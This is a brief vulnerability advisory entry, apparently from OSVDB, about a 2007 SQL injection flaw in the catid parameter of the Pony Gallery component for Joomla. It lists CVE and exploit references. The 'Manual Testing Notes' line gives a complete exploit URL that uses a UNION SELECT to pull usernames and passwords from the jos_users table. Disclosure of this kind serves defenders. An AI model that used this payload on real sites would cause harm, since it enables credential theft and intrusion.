Pony Gallery Component for Joomla! index.php catid Variable SQL

2007-07-19T00:00:00
ID OSVDB:37098
Type osvdb
Reporter OSVDB
Modified 2007-07-19T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

References:

ISS X-Force ID: 35493 Generic Exploit URL: http://www.milw0rm.com/exploits/4201 FrSIRT Advisory: ADV-2007-2616 CVE-2007-4046 Bugtraq ID: 24972